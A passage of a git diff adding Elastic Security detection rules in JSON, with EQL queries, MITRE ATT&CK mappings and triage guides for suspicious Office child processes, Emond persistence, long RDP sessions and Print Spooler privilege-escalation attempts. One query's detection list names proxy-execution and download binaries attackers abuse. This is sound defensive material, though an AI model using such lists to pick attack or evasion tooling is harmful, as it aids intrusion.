Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "a624863f-a70d-417f-a7d2-7a404638d47f_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_112.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_112.json new file mode 100644 index 00000000000..b68b1353054 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_112.json @@ -0,0 +1,151 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious MS Office Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Office Child Process\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThis rule looks for suspicious processes spawned by MS Office programs. This is generally the result of the execution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\n \"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\",\n \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\", \"outlook.exe\"\n ) and\n process.name : (\n \"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\",\n \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\", \"iexpress.exe\",\n \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\", \"net1.exe\", \"netsh.exe\",\n \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\", \"pwsh.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\", \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\",\n \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\",\n \"xwizard.exe\", \"explorer.exe\", \"rundll32.exe\", \"hh.exe\", \"msdt.exe\"\n ) and\n not (\n process.parent.name : \"outlook.exe\" and\n process.name : \"rundll32.exe\" and\n process.args : \"shell32.dll,Control_RunDLL\" and\n process.args : \"srchadmin.dll\"\n )\n", + "references": [ + "https://www.elastic.co/blog/vulnerability-summary-follina" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "a624863f-a70d-417f-a7d2-7a404638d47f_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_107.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_107.json new file mode 100644 index 00000000000..4399f166d26 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_107.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of the Event Monitor Daemon (emond) rules. Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Emond Rules Creation or Modification", + "query": "file where host.os.type == \"macos\" and event.type != \"deletion\" and\n file.path : (\"/private/etc/emond.d/rules/*.plist\", \"/etc/emon.d/rules/*.plist\", \"/private/var/db/emondClients/*\")\n", + "references": [ + "https://www.xorrior.com/emond-persistence/", + "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.014", + "name": "Emond", + "reference": "https://attack.mitre.org/techniques/T1546/014/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_3.json b/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_3.json new file mode 100644 index 00000000000..cea5593b47e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected unusually high mean of RDP session duration. Long RDP sessions can be used to evade detection mechanisms via session persistence, and might be used to perform tasks such as lateral movement, that might require uninterrupted access to a compromised machine.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_mean_rdp_session_duration", + "name": "High Mean of RDP Session Duration", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "a74c60cb-70ee-4629-a127-608ead14ebf1", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "a74c60cb-70ee-4629-a127-608ead14ebf1_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_110.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_110.json new file mode 100644 index 00000000000..9c13032025c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_110.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service including CVE-2020-1048 and CVE-2020-1337.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler SPL File Created", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\",\n \"System\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\rundll32.exe\")\n", + "references": [ + "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_111.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_111.json new file mode 100644 index 00000000000..62e04a67766 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_111.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service including CVE-2020-1048 and CVE-2020-1337.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler SPL File Created", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\",\n \"System\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n 